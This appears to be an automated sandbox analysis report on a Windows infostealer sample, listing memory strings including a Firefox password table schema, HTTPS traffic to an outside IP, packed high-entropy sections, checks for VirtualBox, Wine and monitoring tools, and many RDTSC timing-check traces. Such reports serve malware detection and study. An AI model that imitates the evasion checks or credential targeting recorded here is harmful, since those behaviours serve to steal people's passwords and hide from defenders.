Source: file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: file.exe, 00000000.00000003.2074209325.000000000605E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: file.exe, 00000000.00000003.2074209325.000000000605E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: file.exe, 00000000.00000003.2074209325.000000000605E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: file.exe, 00000000.00000003.2074209325.000000000605E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.2074209325.000000000605E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: file.exe, 00000000.00000003.2074209325.000000000605E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49710 version: TLS 1.2

              System Summary

              Source: file.exe | Static PE information: section name:
              Source: file.exe | Static PE information: section name: .idata
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_016373C7
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0163742A
              Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exe | Static PE information: Section: ZLIB complexity 0.9981938185736677
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@5/1
              Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: file.exe, 00000000.00000003.2045451295.0000000005D38000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060210778.0000000005D36000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: file.exe | String found in binary or memory: RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeU
              Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
              Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
              Source: file.exe | Static file information: File size 2975744 > 1048576
              Source: file.exe | Static PE information: Raw size of syfhwmyd is bigger than: 0x100000 < 0x2aae00

              Data Obfuscation

              Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.20000.0.unpack :EW;.rsrc:W;.idata :W;syfhwmyd:EW;vfrwkpsf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;syfhwmyd:EW;vfrwkpsf:EW;.taggant:EW;
              Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
              Source: file.exe | Static PE information: real checksum: 0x2d7c8b should be: 0x2e3ebf
              Source: file.exe | Static PE information: section name:
              Source: file.exe | Static PE information: section name: .idata
              Source: file.exe | Static PE information: section name: syfhwmyd
              Source: file.exe | Static PE information: section name: vfrwkpsf
              Source: file.exe | Static PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_01642EA9 push eax; ret 0_3_01642EF1
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_01643212 pushad ; retf 0_3_016432E1
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0164D70A push ss; ret 0_3_0164D70B
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_01639F48 push ebp; iretd 0_3_01639F49
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0165373A push ss; ret 0_3_0165373B
              Source: file.exe | Static PE information: section name: entropy: 7.985188315102083

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
              Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe | System information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2169A4 second address: 2169A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2169A8 second address: 2169AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 216DA9 second address: 216DB3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F466925DD9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 217037 second address: 21704D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4668B9A730h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 218768 second address: 21876E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21876E second address: 218774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1E5BC2 second address: 1E5BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F466925DD96h 0x0000000a jmp 00007F466925DDA4h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2194DE second address: 2194E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2194E4 second address: 2194E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2194E9 second address: 2194F3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4668B9A72Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21AD0A second address: 21AD0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21AD0E second address: 21AD12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21AD12 second address: 21AD33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F466925DDA5h 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21AD33 second address: 21AD64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jc 00007F4668B9A73Ch 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007F4668B9A726h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21AD64 second address: 21AD7D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F466925DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007F466925DD96h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21AD7D second address: 21AD87 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4668B9A726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22073F second address: 220749 instructions: 0x00000000 rdtsc 0x00000002 js 00007F466925DD9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 220749 second address: 220750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 220B9F second address: 220BA9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F466925DDA2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 220BA9 second address: 220BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4668B9A726h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 220E58 second address: 220E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 220E62 second address: 220E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2210BB second address: 2210C5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F466925DD9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 222E0E second address: 222E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 222E14 second address: 222E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F466925DDA1h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 222E34 second address: 222E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 223363 second address: 223369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 223369 second address: 22336D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22336D second address: 223371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 223371 second address: 223391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4668B9A734h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 223391 second address: 2233A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DD9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 223B7B second address: 223B8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jp 00007F4668B9A738h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 223B8D second address: 223B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 223D04 second address: 223D0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 224D5D second address: 224D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F466925DDA1h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22580F second address: 225822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F4668B9A726h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F4668B9A726h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2268FA second address: 2268FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 225822 second address: 225845 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A734h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F4668B9A726h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2273A8 second address: 2273AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2268FF second address: 226909 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4668B9A72Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 225845 second address: 225849 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2297B6 second address: 2297BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22A165 second address: 22A183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F466925DDA1h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F466925DD96h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22A183 second address: 22A187 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22A187 second address: 22A1FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F466925DD98h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 add dword ptr [ebp+122D1E0Fh], ecx 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+122D2E31h], ecx 0x00000032 mov esi, ebx 0x00000034 push 00000000h 0x00000036 sub dword ptr [ebp+122D282Eh], ecx 0x0000003c xchg eax, ebx 0x0000003d pushad 0x0000003e je 00007F466925DDAEh 0x00000044 jmp 00007F466925DDA8h 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F466925DDA5h 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22B34E second address: 22B354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22E05A second address: 22E064 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F466925DD9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22EFA5 second address: 22EFAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F4668B9A726h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 231000 second address: 231005 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 231005 second address: 23101D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4668B9A72Ch 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23101D second address: 231031 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DDA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23559C second address: 2355A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2355A2 second address: 2355A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23654F second address: 23656A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A730h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 235735 second address: 23573A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 235827 second address: 235839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A72Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 237415 second address: 237419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2366A6 second address: 23671F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d sub dword ptr [ebp+122D1E0Fh], edi 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov ebx, esi 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 push 00000000h 0x00000025 push ebx 0x00000026 call 00007F4668B9A728h 0x0000002b pop ebx 0x0000002c mov dword ptr [esp+04h], ebx 0x00000030 add dword ptr [esp+04h], 0000001Ch 0x00000038 inc ebx 0x00000039 push ebx 0x0000003a ret 0x0000003b pop ebx 0x0000003c ret 0x0000003d mov ebx, 08B1F922h 0x00000042 mov eax, dword ptr [ebp+122D113Dh] 0x00000048 and ebx, dword ptr [ebp+1246D681h] 0x0000004e push FFFFFFFFh 0x00000050 or edi, dword ptr [ebp+122D2D04h] 0x00000056 nop 0x00000057 push ebx 0x00000058 push edi 0x00000059 push ebx 0x0000005a pop ebx 0x0000005b pop edi 0x0000005c pop ebx 0x0000005d push eax 0x0000005e pushad 0x0000005f jmp 00007F4668B9A72Dh 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 238435 second address: 23843F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F466925DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2395B0 second address: 2395B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23762F second address: 237635 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2395B4 second address: 2395BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2395BD second address: 2395D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jno 00007F466925DD96h 0x00000012 jnl 00007F466925DD96h 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 237635 second address: 23764C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F4668B9A72Ch 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2395D6 second address: 2395E0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F466925DD9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
